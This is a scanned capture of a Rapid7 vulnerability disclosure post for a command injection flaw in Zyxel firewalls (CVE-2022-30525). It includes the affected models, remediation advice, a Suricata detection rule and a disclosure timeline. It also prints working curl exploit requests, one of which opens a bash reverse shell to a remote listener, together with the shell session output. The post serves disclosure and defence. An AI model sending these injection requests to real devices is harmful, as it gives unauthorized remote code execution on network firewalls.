www.rapid7.com Open in urlscan Pro
13.224.198.4  Public Scan

URL: https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injectio...
Submission: On May 26 via api from US — Scanned from DE

Form analysis 6 forms found in the DOM

/search

<form action="/search">
  <div class="container flex flex-jc-c flex-ai-c">
    <div class="search-content flex flex-jc-fs flex-ai-c"><i class="r7-icon r7-icon-search-magnify"></i><input type="search" class="search-input" name="q" placeholder="Search"><input type="submit" class="search-submit button blue"
        value="Search"><a id="btnSearchCloseMobile" class="search-close"><i class="r7-icon r7-icon-delete-x"></i></a></div>
  </div>
</form>

/search

<form action="/search" class="search-content flex flex-jc-c flex-ai-c"><i class="r7-icon r7-icon-search-magnify"></i><input type="search" class="search-input" name="q" placeholder="Search"><input type="submit" class="search-submit button blue"
    value="Search"><a class="search-close"><i class="r7-icon r7-icon-delete-x"></i></a></form>

/search/

<form action="/search/">
  <input class="sb-search-input" placeholder="Search all the things" type="search" value="" name="q" id="search">
  <input class="sb-search-submit" type="submit" value="">
</form>

<form novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;">
</form>

<form id="contactModal" class="formBlock freemail mkto contactModal" data-block-name="Contact Form Block">
  <div id="intro">
    <div id="thankyouText" style="display:none;" class="messageBox green">
      <h4><span class="success">Success!</span> Thank you for submission. We will be in touch shortly.</h4>
    </div>
    <div id="errorText" style="display:none;" class="messageBox red">
      <h4><span class="error">Oops!</span> There was a problem in submission. Please try again.</h4>
    </div>
    <div>
      <h2>Submit your information and we will get in touch with you.</h2>
    </div>
  </div>
  <fieldset>
    <p id="fieldInstruction" class="instructions">All fields are mandatory</p>
    <dl>
      <dd>
        <label for="firstName">First Name</label>
        <input id="firstName" type="text" name="firstName" tabindex="3">
      </dd>
    </dl>
    <dl>
      <dd>
        <label for="lastName">Last Name</label>
        <input id="lastName" type="text" name="lastName" tabindex="4">
      </dd>
    </dl>
    <dl>
      <dd>
        <label for="jobTitle">Job Title</label>
        <input id="jobTitle" type="text" name="jobTitle" tabindex="5">
      </dd>
    </dl>
    <dl>
      <dd>
        <label for="jobLevel">Job Level</label>
        <select name="jobLevel" id="jobLevel" tabindex="1" class="normalSelect dropdownSelect">
          <option value="0">Job Level</option>
          <option value="Analyst">Analyst</option>
          <option value="System/Security Admin">System/Security Admin</option>
          <option value="Manager">Manager</option>
          <option value="Director">Director</option>
          <option value="VP">VP</option>
          <option value="CxO">CxO</option>
          <option value="Student">Student</option>
          <option value="Other">Other</option>
        </select>
      </dd>
    </dl>
    <dl>
      <dd>
        <label for="companyName">Company</label>
        <input id="companyName" type="text" name="companyName" tabindex="6">
      </dd>
    </dl>
    <dl>
      <dd>
        <label for="email">Email</label>
        <input id="email" type="text" name="email" tabindex="7">
      </dd>
    </dl>
    <dl>
      <dd>
        <div class="intl-phone">
          <label for="phone">Phone</label>
          <div class="flag-container">
            <div class="selected-flag">
              <div class="iti-flag"></div>
            </div>
            <ul class="country-list"></ul>
          </div>
          <input id="phone" type="text" name="phone" tabindex="8">
        </div>
      </dd>
    </dl>
    <dl>
      <dd>
        <label for="country">Country</label>
        <select name="country" id="country" tabindex="9" class="form_SelectInstruction normalSelect" onchange="updateCountryData('#contactModal');"></select>
      </dd>
    </dl>
    <dl>
      <dd>
        <label for="state">State</label>
        <select name="state" id="state" tabindex="10" class="form_SelectInstruction normalSelect dropdownSelect"></select>
      </dd>
    </dl>
    <dl class="clearfix expand">
      <dd>
        <label for="state">Reason for Contact</label>
        <select name="contactType" id="contactType" tabindex="1" class="normalSelect dropdownSelect">
          <option value="0">- Select -</option>
          <option value="20437" data-subopts="20437|Request a Demo;20438|Get Pricing Info;20439|General">I'd like to learn more about vulnerability management</option>
          <option value="20440" data-subopts="20440|Request a Demo;20441|Get Pricing Info;20442|General">I'd like to learn more about application security</option>
          <option value="20443" data-subopts="20443|Request a Demo;20444|Get Pricing Info;20445|General">I'd like to learn more about incident detection and response</option>
          <option value="20433" data-subopts="20433|Request a Demo;20446|Get Pricing Info;20447|General">I'd like to learn more about cloud security</option>
          <option value="20448" data-subopts="">I'd like to learn more about Rapid7 professional or managed services</option>
          <option value="20450" data-subopts="">I'd like to learn more about visibility, analytics, and automation</option>
          <option value="20434" data-subopts="20434|Request a Demo;20435|Get Pricing Info;20436|General">I'd like to learn more about building a comprehensive security program</option>
          <option value="21019" data-subopts="21019|Request a demo;21021|Get Pricing Info;21020|General">I'd like to learn more about threat intelligence.</option>
        </select>
      </dd>
    </dl>
    <dl class="clearfix expand" id="contactTypeSecondaryParent" style="display:none;">
      <dd>
        <select name="contactTypeSecondary" id="contactTypeSecondary" tabindex="2" class="normalSelect dropdownSelect">
          <option value="0">- Select -</option>
        </select>
      </dd>
    </dl>
    <dl class="expand" id="consultant" style="display: none;">
      <input id="consultantField" type="checkbox" class="r7-check">
      <label for="consultantField">I am a consultant, partner, or reseller.</label>
      <br>
      <br>
    </dl>
    <dl class="expand checkboxContainer" id="optout" style="display:none;">
      <dd>
        <input id="explicitOptOut" type="checkbox" class="r7-check">
        <label for="explicitOptOut">I do not want to receive emails regarding Rapid7's products and services.</label>
      </dd>
      <div class="disc">
        <p>Issues with this page? Please email <a href="mailto:info@rapid7.com">info@rapid7.com</a>. Please see updated <a href="/privacy-policy/">Privacy Policy</a></p>
      </div>
    </dl>
    <dl class="expand">
      <button class="submit button btn-primary mdBtn" tabindex="11">Submit</button>
    </dl>
    <input type="hidden" id="formName" value="ContactPage">
    <input type="hidden" id="contactUsFormURL"
      value="https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/?utm_source=email&amp;utm_medium=marketo&amp;utm_campaign=ivm-newsletter22">
    <input type="hidden" id="landorExpand" value="land">
  </fieldset>
</form>

<form id="mktoForm_4144" novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); width: 1601px;">
  <style type="text/css">
    .mktoForm .mktoButtonWrap.mktoSimple .mktoButton {
      color: #fff;
      border: 1px solid #75ae4c;
      padding: 0.4em 1em;
      font-size: 1em;
      background-color: #99c47c;
      background-image: -webkit-gradient(linear, left top, left bottom, from(#99c47c), to(#75ae4c));
      background-image: -webkit-linear-gradient(top, #99c47c, #75ae4c);
      background-image: -moz-linear-gradient(top, #99c47c, #75ae4c);
      background-image: linear-gradient(to bottom, #99c47c, #75ae4c);
    }

    .mktoForm .mktoButtonWrap.mktoSimple .mktoButton:hover {
      border: 1px solid #447f19;
    }

    .mktoForm .mktoButtonWrap.mktoSimple .mktoButton:focus {
      outline: none;
      border: 1px solid #447f19;
    }

    .mktoForm .mktoButtonWrap.mktoSimple .mktoButton:active {
      background-color: #75ae4c;
      background-image: -webkit-gradient(linear, left top, left bottom, from(#75ae4c), to(#99c47c));
      background-image: -webkit-linear-gradient(top, #75ae4c, #99c47c);
      background-image: -moz-linear-gradient(top, #75ae4c, #99c47c);
      background-image: linear-gradient(to bottom, #75ae4c, #99c47c);
    }
  </style>
  <div class="mktoFormRow">
    <div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
      <div class="mktoOffset" style="width: 10px;"></div>
      <div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 110px;">
          <div class="mktoAsterix">*</div>Work Email:
        </label>
        <div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="Email" name="Email" placeholder="Work Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
          class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
        <div class="mktoClear"></div>
      </div>
      <div class="mktoClear"></div>
    </div>
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow">
    <div class="mktoPlaceholder mktoPlaceholderHtmlText_2018-05-24T14 942Z"></div>
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="AnonymousIP" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="browseLang" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="InferredCountry" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="LeadSource" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="ClickSource" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="preferenceBlogDigest" class="mktoField mktoFieldDescriptor mktoFormCol" value="true" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoFormRow"><input type="hidden" name="preferencesLastUpdated" class="mktoField mktoFieldDescriptor mktoFormCol" value="{{system.Date}}" style="margin-bottom: 10px;">
    <div class="mktoClear"></div>
  </div>
  <div class="mktoButtonRow"><span class="mktoButtonWrap mktoSimple" style="margin-left: 120px;"><button type="submit" class="mktoButton">Subscribe</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
    value="4144"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="411-NAK-970">
</form>

Text Content

 * Products
    * Insight Platform Solutions
    * XDR & SIEM
      INSIGHTIDR
    * Threat Intelligence
      THREAT COMMAND
    * Vulnerability Management
      INSIGHTVM
    * Dynamic Application Security Testing
      INSIGHTAPPSEC
    * Orchestration & Automation (SOAR)
      INSIGHTCONNECT
    * Cloud Security
      INSIGHTCLOUDSEC
   
    * More Solutions
    * Penetration Testing
      METASPLOIT
    * On-Prem Vulnerability Management
      NEXPOSE
    * Application Monitoring & Protection
      TCELL
   
   Insight PlatformFree Trial
 * Services
    * MANAGED SERVICES
    * Detection and Response
      24/7 MONITORING & REMEDIATION FROM MDR EXPERTS
    * Vulnerability Management
      PERFECTLY OPTIMIZED RISK ASSESSMENT
    * Application Security
      SCAN MANAGEMENT & VULNERABILITY VALIDATION
   
    * OTHER SERVICES
    * Security Advisory Services
      PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES
    * Product Consulting
      QUICK-START & CONFIGURATION
    * Training & Certification
      SKILLS & ADVANCEMENT
    * Penetration Services
      TEST YOUR DEFENSES IN REAL-TIME
    * IoT Security Testing
      SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD
    * Premium Support
      PRIORITY HELP & FASTER SOLUTIONS

 * Support & Resources
    * SUPPORT
    * Support Portal
      CONTACT CUSTOMER SUPPORT
    * Product Documentation
      EXPLORE PRODUCT GUIDES
    * Release Notes
      DISCOVER THE LATEST PRODUCT UPDATES
    * Contact Us
      TALK TO SALES
   
    * RESOURCES
    * Fundamentals
      FOUNDATIONAL SECURITY KNOWLEDGE
    * Blog
      THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE
    * Resources Library
      E-BOOKS, WHITE PAPERS, VIDEOS & BRIEFS
    * Extensions Library
      PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY
    * Partners
      RAPID7 PARTNER ECOSYSTEM
    * Webcasts & Events
      UPCOMING OPPORTUNITIES TO CONNECT WITH US
    * Vulnerability & Exploit Database
      SEARCH THE LATEST SECURITY RESEARCH

 * Company
    * OVERVIEW
    * About Us
      OUR STORY
    * Leadership
      EXECUTIVE TEAM & BOARD
    * News & Press Releases
      THE LATEST FROM OUR NEWSROOM
    * Careers
      JOIN RAPID7
   
    * COMMUNITY & CULTURE
    * Social Good
      OUR COMMITMENT & APPROACH
    * Rapid7 Cybersecurity Foundation
      BUILDING THE FUTURE
    * Diversity, Equity & Inclusion
      EMPOWERING PEOPLE
    * Open Source
      STRENGTHENING CYBERSECURITY
    * Public Policy
      ENGAGEMENT & ADVOCACY

 * Research
 * en
    * English
    * Deutsch
    * 日本語

 *  Sign In

Blog
 * Select
    * Vuln. Management
    * Detection & Response
    * App Security
    * Research
    * Cloud Security
    * SOAR
    * Metasploit
    * More...

Try Now

 * Products
    * Insight Platform Solutions
    * XDR & SIEM
      INSIGHTIDR
    * Threat Intelligence
      THREAT COMMAND
    * Vulnerability Management
      INSIGHTVM
    * Dynamic Application Security Testing
      INSIGHTAPPSEC
    * Orchestration & Automation (SOAR)
      INSIGHTCONNECT
    * Cloud Security
      INSIGHTCLOUDSEC
   
    * More Solutions
    * Penetration Testing
      METASPLOIT
    * On-Prem Vulnerability Management
      NEXPOSE
    * Application Monitoring & Protection
      TCELL
   
   Insight PlatformFree Trial
 * Services
    * MANAGED SERVICES
    * Detection and Response
      24/7 MONITORING & REMEDIATION FROM MDR EXPERTS
    * Vulnerability Management
      PERFECTLY OPTIMIZED RISK ASSESSMENT
    * Application Security
      SCAN MANAGEMENT & VULNERABILITY VALIDATION
   
    * OTHER SERVICES
    * Security Advisory Services
      PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES
    * Product Consulting
      QUICK-START & CONFIGURATION
    * Training & Certification
      SKILLS & ADVANCEMENT
    * Penetration Services
      TEST YOUR DEFENSES IN REAL-TIME
    * IoT Security Testing
      SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD
    * Premium Support
      PRIORITY HELP & FASTER SOLUTIONS

 * Support & Resources
    * SUPPORT
    * Support Portal
      CONTACT CUSTOMER SUPPORT
    * Product Documentation
      EXPLORE PRODUCT GUIDES
    * Release Notes
      DISCOVER THE LATEST PRODUCT UPDATES
    * Contact Us
      TALK TO SALES
   
    * RESOURCES
    * Fundamentals
      FOUNDATIONAL SECURITY KNOWLEDGE
    * Blog
      THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE
    * Resources Library
      E-BOOKS, WHITE PAPERS, VIDEOS & BRIEFS
    * Extensions Library
      PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY
    * Partners
      RAPID7 PARTNER ECOSYSTEM
    * Webcasts & Events
      UPCOMING OPPORTUNITIES TO CONNECT WITH US
    * Vulnerability & Exploit Database
      SEARCH THE LATEST SECURITY RESEARCH

 * Company
    * OVERVIEW
    * About Us
      OUR STORY
    * Leadership
      EXECUTIVE TEAM & BOARD
    * News & Press Releases
      THE LATEST FROM OUR NEWSROOM
    * Careers
      JOIN RAPID7
   
    * COMMUNITY & CULTURE
    * Social Good
      OUR COMMITMENT & APPROACH
    * Rapid7 Cybersecurity Foundation
      BUILDING THE FUTURE
    * Diversity, Equity & Inclusion
      EMPOWERING PEOPLE
    * Open Source
      STRENGTHENING CYBERSECURITY
    * Public Policy
      ENGAGEMENT & ADVOCACY

 * Research

 * en
    * English
    * Deutsch
    * 日本語

 * Sign In



 * Blog
 * Vuln. Management
 * Detection & Response
 * App Security
 * Research
 * Cloud Security
 * SOAR
 * Metasploit
 * More...

Try Now


CVE-2022-30525 (FIXED): ZYXEL FIREWALL UNAUTHENTICATED REMOTE COMMAND INJECTION

 * May 12, 2022
 * 5 min read
 * Jake Baines

 * 
 * 
 * 

Last updated at Mon, 16 May 2022 14:31:01 GMT

Rapid7 discovered and reported a vulnerability that affects Zyxel firewalls
supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN
series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The
vulnerability, identified as CVE-2022-30525, allows an unauthenticated and
remote attacker to achieve arbitrary code execution as the nobody user on the
affected device.

The following table contains the affected models and firmware versions.

Affected Model Affected Firmware Version USG FLEX 100, 100W, 200, 500, 700
ZLD5.00 thru ZLD5.21 Patch 1 USG20-VPN, USG20W-VPN ZLD5.10 thru ZLD5.21 Patch 1
ATP 100, 200, 500, 700, 800 ZLD5.10 thru ZLD5.21 Patch 1

The VPN series, which also supports ZTP, is not vulnerable because it does not
support the required functionality.


PRODUCT DESCRIPTION

The affected firewalls are advertised for both small branch and corporate
headquarter deployments. They offer VPN solutions, SSL inspection, web
filtering, intrusion protection, and email security, and advertise up to 5 Gbps
throughput through the firewall.

The affected models are relatively popular, with more than 15,000 visible on
Shodan .


CVE-2022-30525: UNAUTHENTICATED REMOTE COMMAND INJECTION

The affected models are vulnerable to unauthenticated and remote command
injection via the administrative HTTP interface. Commands are executed as the
nobody user. This vulnerability is exploited through the /ztp/cgi-bin/handler
URI and is the result of passing unsanitized attacker input into the os.system
method in lib_wan_settings.py. The vulnerable functionality is invoked in
association with the setWanPortSt command. An attacker can inject arbitrary
commands into the mtu or the data parameter. Below is an example curl that will
cause the firewall to execute ping 192.168.1.220:

curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler


On the firewall, the ps output looks like the following:

nobody   11040  0.0  0.2  21040  5152 ?        S    Apr10   0:00  \_ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL
nobody   16052 56.4  0.6  18104 11224 ?        S    06:16   0:02  |   \_ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py
nobody   16055  0.0  0.0   3568  1492 ?        S    06:16   0:00  |       \_ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 >/dev/null 2>&1
nobody   16057  0.0  0.0   2152   564 ?        S    06:16   0:00  |           \_ ping 192.168.1.220


A reverse shell can be established using the normal bash GTFOBin . For example:

curl -v --insecure -X POST -H "Content-Type: application/json" -d '
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":
"1","vlanid":"5","mtu":"; bash -c \"exec bash -i &>/dev/tcp/
192.168.1.220/1270 <&1;\";","data":"hi"}' https://192.168.1.1
/ztp/cgi-bin/handler


The resulting reverse shell can be used like so:

albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 192.168.1.1 37882
bash: cannot set terminal process group (11037): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1$ id
id
uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
bash-5.1$ uname -a
uname -a
Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
Bash-5.1



METASPLOIT MODULE

A Metasploit module has been developed for these vulnerabilities. The module can
be used to establish a nobody Meterpreter session. The following video
demonstrates exploitation:



We’ve shared a PCAP that captures Metasploit’s exploitation of a Zyxel USG FLEX
100. The PCAP can be found attached to the module’s pull request . The
Metasploit module injects commands in the mtu field, and as such, the following
Suricata rule should flag its use:

alert http any any -> any any ( \
    msg:"Possible Zyxel ZTP setWanPortSt mtu Exploit Attempt"; \
    flow:to_server; \
    http.method; content:"POST"; \
    http.uri; content:"/ztp/cgi-bin/handler"; \
    http.request_body; content:"setWanPortSt"; \
    http.request_body; content:"mtu"; \
    http.request_body; pcre:"/mtu["']\s*:\s*["']\s*[^0-9]+/i";
    classtype:misc-attack; \
    sid:221270;)



CREDIT

This issue was discovered by Jake Baines of Rapid7, and it is being disclosed in
accordance with Rapid7's vulnerability disclosure policy.


REMEDIATION

Apply the vendor patch as soon as possible. If possible, enable automatic
firmware updates. Disable WAN access to the administrative web interface of the
system.


RAPID7 CUSTOMERS

InsightVM and Nexpose customers can assess their exposure to CVE-2022-30525 with
a remote vulnerability check.


DISCLOSURE TIMELINE

Astute readers will notice this timeline is a little atypical for Rapid7
disclosures. In accordance with our 60-day disclosure policy, we suggested a
coordinated disclosure date in June. Instead, Zyxel released patches to address
this issue on April 28, 2022. At that time, Zyxel did not publish an associated
CVE or security advisory. On May 9, Rapid7 independently discovered Zyxel’s
uncoordinated disclosure. The vendor then reserved CVE-2022-30525.

This patch release is tantamount to releasing details of the vulnerabilities,
since attackers and researchers can trivially reverse the patch to learn precise
exploitation details, while defenders rarely bother to do this. Therefore, we're
releasing this disclosure early in order to assist defenders in detecting
exploitation and to help them decide when to apply this fix in their own
environments, according to their own risk tolerances. In other words, silent
vulnerability patching tends to only help active attackers, and leaves defenders
in the dark about the true risk of newly discovered issues.

April 2022 - Discovered by Jake Baines
April 13, 2022 - Rapid7 discloses to security@zyxel.com.tw. Proposed disclosure
date June 21, 2022.
April 14, 2022 - Zyxel acknowledges receipt.
April 20, 2022 - Rapid7 asks for an update and shares delight over “Here is how
to pronounce ZyXEL’s name” .
April 21, 2022 - Zyxel acknowledges reproduction of the vulnerabilities.
April 28, 2022 - Zyxel releases patches without coordination with vulnerability
reporter.
April 29, 2022 - Zyxel indicates patch is likely to release before June 14,
2022.
May 9, 2022 - Rapid7 realizes Zyxel already issued patches. Rapid7 asks Zyxel
for a response on the silent patches and indicates that our team will publicly
disclose the week of May 9, 2022.
May 10, 2022 - Zyxel reserves CVE-2022-30525 and proposes a new disclosure
schedule.
May 12, 2022 - Zyxel advisory , this disclosure bulletin, and Metasploit module
published.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Subscribe


Additional reading:

 * CVE-2022-28810: ManageEngine ADSelfService Plus Authenticated Command
   Execution (Fixed)
 * CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)
 * CVE-2022-1026: Kyocera Net View Address Book Exposure
 * Analyzing the Attack Landscape: Rapid7’s 2021 Vulnerability Intelligence
   Report
   

POST TAGS

 * Vulnerability Disclosure
 * Research
 * Vulnerability Risk Management
 * Emergent Threat Response

SHARING IS CARING

 * 
 * 
 * 

AUTHOR


Jake Baines



View Jake's Posts

Please enable JavaScript to view the comments powered by Disqus.


TOPICS

 * Metasploit  (769)
 * Vulnerability Management  (397)
 * Detection and Response  (352)
 * Research  (252)
 * Application Security  (146)
 * Cloud Security  (77)


POPULAR TAGS


 * Metasploit
 * Logentries
 * IT Ops
 * Vulnerability Management
 * Detection and Response
 * Metasploit Weekly Wrapup
 * Automation and Orchestration
 * Nexpose
 * Research
 * Incident Detection
 * Exploits
 * Komand
 * Incident Response
 * InsightIDR
 * Penetration Testing

 * .net
 * 2022 Planning
 * 7 Rapid Questions
 * Alcide
 * Android
 * Antivirus
 * API
 * Apple
 * Application Security
 * AppSpider
 * Artificial Intelligence
 * Attack surface analysis
 * Attack Surface Management
 * Authentication
 * Automated Remediation
 * Automation and Orchestration
 * Automation Remediation
 * Awards
 * AWS
 * Azure
 * Black Friday
 * Botnets
 * Breach Preparedness
 * Breach Response News
 * Capture the Flag
 * Car Hacking
 * Career Development
 * Chrome
 * CIS Controls
 * CISOs
 * Cloud Infrastructure
 * Cloud Security
 * CMMC
 * Compliance
 * Confessions of a Former CISO
 * Consulting Services
 * COVID Health
 * COVID-19
 * Critical Infrastructure
 * Cryptocurrency
 * Customer Perspective
 * Cyber Monday
 * Cybersecurity
 * DAST
 * Demystifying XDR
 * Denial of Service (DoS)
 * Deployments
 * Detection and Response
 * DevOps
 * DevSecOps
 * Email Security
 * Emergent Threat Response
 * Emerging Threats
 * End of Life
 * Endpoints
 * episode-10
 * episode-11
 * episode-12
 * episode-16
 * episode-9
 * Events
 * Expert Commentary
 * Exploits
 * Extended Detection and Response
 * Finance
 * Firefox
 * Flash
 * Fundamentals
 * Gartner
 * GDPR
 * Google
 * Government
 * Guest Perspective
 * Guest Post
 * Hacking
 * Hacky Holidays 2021
 * Haxmas
 * Higher Education
 * HIPAA
 * Home Automation
 * Honeypots
 * ICER
 * Identity Access Management
 * incident
 * Incident Detection
 * Incident Response
 * Industry Cyber-Exposure Report
 * Industry Cyber-Exposure Report (ICER)
 * Infographics
 * Infosec
 * Insight platform
 * InsightAppSec
 * InsightCloudSec
 * InsightConnect
 * InsightIDR
 * InsightOps
 * InsightPhishing
 * InsightVM
 * Internet Explorer
 * IntSights
 * IoT
 * IT Ops
 * Java
 * Javascript
 * Kill Chain
 * Komand
 * Kubernates Security
 * Kubernetes
 * L&D
 * Labs
 * Legal
 * Linux
 * Log Management
 * Log Search
 * log4j
 * Log4Shell
 * Logentries
 * Lost Bots
 * Machine Learning
 * Malware
 * Managed Detection and Response
 * Managed Security Service Providers
 * Manual Regex Editor
 * MDR
 * MDR Must-Haves
 * Medical
 * Metasploit
 * Metasploit Weekly Wrapup
 * Microsoft
 * MITRE ATT&CK
 * MSSP
 * National / Industry / Cloud Exposure Report (NICER)
 * National Cybersecurity Awareness Month
 * National Exposure
 * NCSAM
 * Network Traffic Analysis
 * Networking
 * News
 * Nexpose
 * NIST
 * Open Source
 * OSCP
 * OWASP Top 10 2021
 * Patch Tuesday
 * Payload
 * PCI
 * Penetration Testing
 * Permissions
 * Phishing
 * Podcast
 * Product Updates
 * Project Heisenberg
 * Project Sonar
 * Public Policy
 * Python
 * Quarterly Threat Report
 * R7 Book Club
 * Ransomware
 * Rapid7 Culture
 * Rapid7 Disclosure
 * Rapid7 Discuss
 * Rapid7 Perspective
 * Rapid7 Support
 * Red Team
 * Release Notes
 * Remote Working
 * Reports
 * Research
 * RSA
 * Ruby on Rails
 * Russia-Ukraine Conflict
 * SAML
 * SecOps
 * Security Assertion Markup Language
 * Security Nation
 * Security Operations Center (SOC)
 * Security Strategy
 * SIEM
 * Skills
 * Snyk
 * SOAR
 * Social Engineering
 * Spring4Shell
 * Supply Chain Attacks
 * Supply Chain Security
 * tCell
 * The Forecast Is Flipped
 * Third-Party Disclosure
 * This One Time on a Pen Test
 * THOTCON
 * Threat Intel
 * Threat Intel Book Club
 * Tips and Tricks
 * Transportation
 * Under the Hoodie
 * UNITED
 * User Behavior Analytics
 * User Experience
 * Velociraptor
 * Verizon DBIR
 * Virtual Infrastructure
 * Virtual Vegas
 * Vulnerability Assessments
 * Vulnerability Disclosure
 * Vulnerability Management
 * Vulnerability Risk Management
 * WannaCry
 * Whiteboard Wednesday
 * Windows
 * Worms
 * XDR
 * XSS
 * Zero-day


RELATED POSTS

CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)

Read More

A Year on from the Ransomware Task Force Report

Read More

CVE-2022-22972: Critical Authentication Bypass in VMware Workspace ONE Access,
Identity Manager, and vRealize Automation

Read More

Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388

Read More


RELATED POSTS

Vulnerability Disclosure
CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)
Read Full Post
Ransomware
A Year on from the Ransomware Task Force Report
Read Full Post
Emergent Threat Response
CVE-2022-22972: Critical Authentication Bypass in VMware Workspace ONE Access,
Identity Manager, and vRealize Automation
Read Full Post
Emergent Threat Response
Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388
Read Full Post
View All Posts
BACK TO TOP
CUSTOMER SUPPORT
+1-866-390-8113 (Toll Free)
SALES SUPPORT
+1-866-772-7437 (Toll Free)
Need immediate help with a breach?
CLICK HERE
SOLUTIONS
All Solutions Industry Solutions Compliance Solutions
SUPPORT & RESOURCES
Product Support Resource Library Customer Stories Events & Webcasts Training &
Certification IT & Security Fundamentals Vulnerability & Exploit Database
ABOUT US
Company Diversity, Equity, and Inclusion Leadership News & Press Releases Public
Policy Open Source Investors
CONNECT WITH US
Contact Blog Support Login Careers

© Rapid7
Legal Terms
  |  
Privacy Policy
  |  
Export Notice
  |  
Trust
Chat
Contact Us



SUCCESS! THANK YOU FOR SUBMISSION. WE WILL BE IN TOUCH SHORTLY.

OOPS! THERE WAS A PROBLEM IN SUBMISSION. PLEASE TRY AGAIN.


SUBMIT YOUR INFORMATION AND WE WILL GET IN TOUCH WITH YOU.

All fields are mandatory

First Name Last Name Job Title Job Level Job Level Analyst System/Security Admin
Manager Director VP CxO Student Other Company Email
Phone

Country State Reason for Contact - Select - I'd like to learn more about
vulnerability management I'd like to learn more about application security I'd
like to learn more about incident detection and response I'd like to learn more
about cloud security I'd like to learn more about Rapid7 professional or managed
services I'd like to learn more about visibility, analytics, and automation I'd
like to learn more about building a comprehensive security program I'd like to
learn more about threat intelligence. - Select - I am a consultant, partner, or
reseller.

I do not want to receive emails regarding Rapid7's products and services.

Issues with this page? Please email info@rapid7.com. Please see updated Privacy
Policy

Submit


GENERAL:

info@rapid7.com


SALES:

+1-866-772-7437
sales@rapid7.com


SUPPORT:

+1–866–390–8113 (toll free)
support@rapid7.com


INCIDENT RESPONSE:

1-844-727-4347

More Contact Info


NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

*
Work Email:












Subscribe
You’re almost done!
Check your email to confirm your subscription.

Diese Seite ist leider nur auf English verfügbar.

Möchten Sie trotzdem fortfahren?

Weiter zur deutschen Seite Auf der English Seite bleiben


Rapid7 uses cookies and similar technologies as strictly necessary to make our
site work. We and our partners would also like to set additional cookies to
analyze your use of our site, to personalize and enhance your visit to our site
and to show you more relevant content and advertising. These will be set only if
you accept.

You can always review and change your cookie preferences through our cookie
settings page. For more information, please read ourPrivacy Statement

Decline Cookies Accept Cookies
Cookies Settings



PRIVACY PREFERENCE CENTER

When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
